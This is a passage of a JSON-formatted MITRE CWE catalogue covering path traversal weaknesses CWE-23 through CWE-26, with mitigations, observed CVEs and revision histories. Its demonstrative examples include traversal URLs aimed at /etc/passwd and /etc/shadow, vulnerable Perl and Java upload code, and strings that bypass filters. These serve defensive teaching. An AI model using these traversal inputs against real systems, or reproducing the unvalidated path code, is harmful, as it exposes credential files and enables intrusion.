string."]}},{"attr":{"@_Mitigation_ID":"MIT-20.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.","Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes \\"..\\" sequences and symbolic links (CWE-23, CWE-59). This includes:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["realpath() in C","getCanonicalPath() in Java","GetFullPath() in ASP.NET","realpath() or abs_path() in Perl","realpath() in PHP"]}}}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following URLs are vulnerable to this attack:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"http://example.com.br/get-files.jsp?file=report.pdfhttp://example.com.br/get-page.php?home=aaa.htmlhttp://example.com.br/some-page.asp?page=index.html","xhtml:br":["",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"http://example.com.br/get-files?file=../../../../somedir/somefilehttp://example.com.br/../../../../etc/shadowhttp://example.com.br/get-files?file=../../../../etc/passwd","xhtml:br":["",""]}}],"Body_Text":"A simple way to execute this attack is like this:"},{"attr":{"@_Demonstrative_Example_ID":"DX-27"},"Intro_Text":"The following code could be for a social networking application in which each user\'s profile information is stored in a separate file. All files are stored in a single directory.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $dataPath = \\"/users/cwe/profiles\\";my $username = param(\\"user\\");my $profilePath = $dataPath . \\"/\\" . $username;open(my $fh, \\"&lt;$profilePath\\") || ExitError(\\"profile read error: $profilePath\\");print \\"&lt;ul&gt;\\\\n\\";while (&lt;$fh&gt;) {}print \\"&lt;/ul&gt;\\\\n\\";","xhtml:br":["","","","","","",""],"xhtml:div":{"#text":"print \\"&lt;li&gt;$_&lt;/li&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/users/cwe/profiles/../../../etc/passwd"},{"attr":{"@_Nature":"result"},"xhtml:div":"/etc/passwd"}],"Body_Text":["While the programmer intends to access files such as \\"/users/cwe/profiles/alice\\" or \\"/users/cwe/profiles/bob\\", there is no verification of the incoming user parameter. An attacker could provide a string such as:","The program would generate a profile pathname like this:","When the file is opened, the operating system resolves the \\"../\\" during path canonicalization and actually accesses this file:","As a result, the attacker could read the entire text of the password file.","Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because of the lack of output encoding of the file that is retrieved, there might also be a cross-site scripting problem (CWE-79) if profile contains any HTML, but other code would need to be examined."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0298","Description":"Server allows remote attackers to cause a denial of service via certain HTTP GET requests containing a %2e%2e (encoded dot-dot), several \\"/../\\" sequences, or several \\"../\\" in a URI.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0298"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in denylist for web server, allowing path traversal attacks when the server is run in Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"},{"Reference":"CVE-2002-0946","Description":"Arbitrary files may be read files via ..\\\\ (dot dot) sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0946"},{"Reference":"CVE-2002-1042","Description":"Directory traversal vulnerability in search engine for web server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042"},{"Reference":"CVE-2002-1209","Description":"Directory traversal vulnerability in FTP server allows remote attackers to read arbitrary files via \\"..\\\\\\" sequences in a GET request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1209"},{"Reference":"CVE-2002-1178","Description":"Directory traversal vulnerability in servlet allows remote attackers to execute arbitrary commands via \\"..\\\\\\" sequences in an HTTP request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1178"},{"Reference":"CVE-2002-1987","Description":"Protection mechanism checks for \\"/..\\" but doesn\'t account for Windows-specific \\"\\\\..\\" allowing read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987"},{"Reference":"CVE-2005-2142","Description":"Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a \\"\\\\..\\" sequence in an LS command.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142"},{"Reference":"CVE-2002-0160","Description":"The administration function in Access Control Server allows remote attackers to read HTML, Java class, and image files outside the web root via a \\"..\\\\..\\" sequence in the URL to port 2002.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0160"},{"Reference":"CVE-2001-0467","Description":"\\"\\\\...\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0467"},{"Reference":"CVE-2001-0963","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0963"},{"Reference":"CVE-2001-1193","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1193"},{"Reference":"CVE-2001-1131","Description":"\\"...\\" in cd command in FTP server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1131"},{"Reference":"CVE-2001-0480","Description":"read of arbitrary files and directories using GET or CD with \\"...\\" in Windows-based FTP server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0480"},{"Reference":"CVE-2002-0288","Description":"read files using \\".\\" and Unicode-encoded \\"/\\" or \\"\\\\\\" characters in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0288"},{"Reference":"CVE-2003-0313","Description":"Directory listing of web server using \\"...\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0313"},{"Reference":"CVE-2005-1658","Description":"Triple dot","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1658"},{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"},{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"},{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Relative Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"139"}},{"attr":{"@_CAPEC_ID":"76"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-192"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Filenames and Paths&#34;, Page 503"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"24":{"attr":{"@_ID":"24","@_Name":"Path Traversal: \'../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \\"../\\" manipulation is the canonical manipulation for operating systems that use \\"/\\" as directory separators, such as UNIX- and Linux-based systems. In some cases, it is useful for bypassing protection schemes in environments for which \\"/\\" is supported but not the primary separator, such as Windows, which uses \\"\\\\\\" but can also accept \\"/\\"."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Dot Dot Slash - \'../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"25":{"attr":{"@_ID":"25","@_Name":"Path Traversal: \'/../filedir\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/../\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Sometimes a program checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/../filedir"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Dot Dot Slash - \'/../filedir\'","attr":{"@_Date":"2008-04-11"}}}},"26":{"attr":{"@_ID":"26","@_Name":"Path Traversal: \'/dir/../filename\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \\"/dir/../filename\\" sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'/dir/../filename\' manipulation is useful for bypassing some path traversal protection schemes. Sometimes a program only checks for \\"../\\" at the beginning of the input, so a \\"/../\\" can bypass that check."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'/directory/../filename"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Leading Directory Dot Dot Slash - 